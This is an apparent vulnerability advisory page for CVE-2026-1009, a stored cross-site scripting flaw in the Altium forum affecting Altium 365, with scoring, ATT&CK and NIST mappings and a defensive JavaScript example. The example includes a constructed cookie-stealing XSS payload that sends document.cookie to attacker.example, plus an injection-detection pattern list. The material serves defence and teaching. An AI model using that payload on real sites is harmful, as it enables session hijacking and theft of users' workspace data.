Cyber Resilience

CVE-2026-1009

Severity: Critical
Published: 15 January 2026
Modified: 23 January 2026
KEV Added: not listed
CVSS v3.1: 9.0 (Critical), vector CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
EPSS: 0.0021 (11.5th percentile)
Risk Priority: 70 (floored blend, peak EPSS)

Summary

CVE-2026-1009 is a critical-severity stored cross-site scripting (CWE-79) vulnerability in Altium Live, from Altium. Its CVSS v3.1 base score is 9.0 (Critical).

Operationally, exploitation maps to the MITRE ATT&CK technique Browser Session Hijacking (T1185). EPSS ranks it at the 11.5th percentile for exploit likelihood (below the median), and it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering): validate and sanitize post content when it is submitted, and encode it when it is rendered.

Deeper analysis

CVE-2026-1009 is a stored cross-site scripting (XSS) vulnerability in the Altium Forum, caused by missing server-side input sanitization of forum post content. It affects Altium 365, where authenticated users can post content that leads to arbitrary JavaScript injection. The issue is associated with CWE-79 (Improper Neutralization of Input During Web Page Generation) and CWE-284 (Improper Access Control), and carries a CVSS v3.1 base score of 9.0 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H).

An authenticated attacker with forum posting privileges can exploit this by injecting malicious JavaScript into a post, which is then stored on the server. When other authenticated Altium 365 users view the affected post, the payload executes in the context of their browser session, granting the attacker unauthorized access to the victim's workspace data, including design files and settings. Successful exploitation requires user interaction, as victims must view the malicious post. The CVSS vector reflects this: PR:L because the attacker needs a forum account, UI:R because a victim must load the post, and S:C because the payload runs in the victim's Altium 365 session rather than only within the forum that stored it.

Altium has published a security advisory with further details on this vulnerability, available at https://www.altium.com/platform/security-compliance/security-advisories.

Vulnerability details

A stored cross-site scripting (XSS) vulnerability exists in the Altium Forum due to missing server-side input sanitization in forum post content. An authenticated attacker can inject arbitrary JavaScript into forum posts, which is stored and executed when other users view the affected post. Successful exploitation allows the attacker's payload to execute in the context of the victim's authenticated Altium 365 session, enabling unauthorized access to workspace data, including design files and workspace settings. Exploitation requires user interaction to view a malicious forum post.

CWE(s)

CWE-79 Improper Neutralization of Input During Web Page Generation (Cross-site Scripting)
CWE-284 Improper Access Control

Related Threats

MITRE ATT&CK Enterprise Techniques (AI-generated mapping)

T1185 Browser Session Hijacking (Collection): Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user behaviors, and intercept information as part of various browser session hijacking techniques.

T1539 Steal Web Session Cookie (Credential Access): An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials.
Why these techniques?

Stored XSS enables arbitrary JS execution in victim browser sessions, directly facilitating session hijacking and cookie theft for unauthorized data access.

Confidence: MEDIUM · MITRE ATT&CK Enterprise v19.0

CVEs Like This One

CVE-2026-1008 (same product: Altium Live)
CVE-2025-27380 (same vendor: Altium)
CVE-2025-24885 (shared CWE-284, CWE-79)
CVE-2026-1010 (same vendor: Altium)
CVE-2026-34561 (shared CWE-79)
CVE-2025-25102 (shared CWE-79)
CVE-2026-32277 (shared CWE-79)
CVE-2025-23429 (shared CWE-79)
CVE-2025-26918 (shared CWE-79)
CVE-2026-46367 (shared CWE-79)

Affected Assets

Vendor: altium
Product: altium live
Version: 1.2.2

Mitigating Controls (NIST 800-53 r5; AI-generated mapping)

SI-10 Information Input Validation (prevent): Directly mandates server-side validation and sanitization of forum post content to block injection of arbitrary JavaScript payloads.

SI-15 Information Output Filtering (prevent): Requires filtering and encoding of stored forum post content during output to prevent execution of XSS payloads in victims' browsers.

Prevent: Enforces restrictions on forum post inputs to limit content types and prevent processing of malicious JavaScript.
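As an added example, not code from Altium, from Altium 365 or from this page, the JavaScript below shows the render pattern described under Deeper analysis (a stored post body interpolated raw into HTML) beside the two server-side fixes the controls above map to: input validation at submission (SI-10) and output encoding with a small tag allowlist at render (SI-15), with a detection helper and a CSP value as defence in depth. The post author and body, the attacker.example URL, the size limit, the allowlist and the CSP string are all assumptions constructed for this example.

```javascript
// Added example (not Altium's code): a minimal forum-post renderer showing the
// stored-XSS pattern behind CVE-2026-1009 and the two server-side fixes the page
// maps to NIST SI-10 (validate input) and SI-15 (encode/filter output).
// All post bodies, the attacker URL and the limits below are constructed.

// --- Vulnerable pattern: the stored body is interpolated straight into HTML ---
function renderPostUnsafe(post) {
  // Whatever a poster typed becomes live markup in every reader's browser.
  return `<article class="post"><h3>${post.author}</h3><div>${post.body}</div></article>`;
}

// --- SI-15: encode on output so stored text can never be interpreted as markup ---
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// If the forum must allow a little formatting, escape everything first and then
// re-enable only exact, attribute-less tags from an allowlist. Because escaping
// runs first, nothing outside this allowlist can survive as markup.
// Assumption: posts only need <b>, <i> and <code>.
const ALLOWED_TAGS = ['b', 'i', 'code'];
function sanitizeMarkup(body) {
  let out = escapeHtml(body);
  for (const tag of ALLOWED_TAGS) {
    out = out.replace(new RegExp(`&lt;(/?)${tag}&gt;`, 'g'), `<$1${tag}>`);
  }
  return out;
}

function renderPostSafe(post) {
  return `<article class="post"><h3>${escapeHtml(post.author)}</h3><div>${sanitizeMarkup(post.body)}</div></article>`;
}

// --- SI-10: validate at submission time; reject what the forum never needs ---
const MAX_BODY_CHARS = 20000; // assumed forum limit
function validatePostInput(body) {
  if (typeof body !== 'string') return { ok: false, reason: 'body must be a string' };
  if (body.length > MAX_BODY_CHARS) return { ok: false, reason: 'body exceeds size limit' };
  // C0 control characters other than tab, LF and CR have no place in a forum post.
  if (/[\u0000-\u0008\u000B\u000C\u000E-\u001F]/.test(body)) return { ok: false, reason: 'control characters' };
  return { ok: true };
}

// --- Telemetry only: flag bodies that look like injection attempts for the SOC.
// This is detection, not a control; the fixes above must not depend on it.
const INJECTION_INDICATORS = [
  [/<\s*script\b/i, 'script tag'],
  [/\bon[a-z]+\s*=/i, 'event-handler attribute'],
  [/javascript\s*:/i, 'javascript: URL'],
  [/<\s*(iframe|object|embed|svg|math)\b/i, 'active-content tag'],
];
function flagSuspicious(body) {
  return INJECTION_INDICATORS.filter(([re]) => re.test(body)).map(([, label]) => label);
}

// Defence in depth (assumed header value): a CSP without 'unsafe-inline' blocks the
// inline handler in the payload below even if an encoding bug slips through.
const CSP_HEADER = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'";

// Constructed attacker post: a broken image whose error handler exfiltrates the session.
const MALICIOUS_POST = {
  author: 'mallory',
  body: `<img src=x onerror="fetch('https://attacker.example/?c='+document.cookie)">`,
};

function demo() {
  console.log('validation:', validatePostInput(MALICIOUS_POST.body));
  console.log('unsafe:', renderPostUnsafe(MALICIOUS_POST));
  console.log('safe:  ', renderPostSafe(MALICIOUS_POST));
  console.log('flags: ', flagSuspicious(MALICIOUS_POST.body));
  console.log('csp:   ', CSP_HEADER);
}
demo();
```

Run it with node. Note that the payload passes validatePostInput: a size and control-character gate is not an XSS filter, which is why the output step must encode regardless of what input checks did. The allowlist step is deliberately encode-first so no attribute or unrecognised tag can reach the browser as markup; a production forum would normally use a maintained sanitizer library rather than this hand-rolled one, but the order (validate on input, encode on output, CSP as backstop) is the point.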
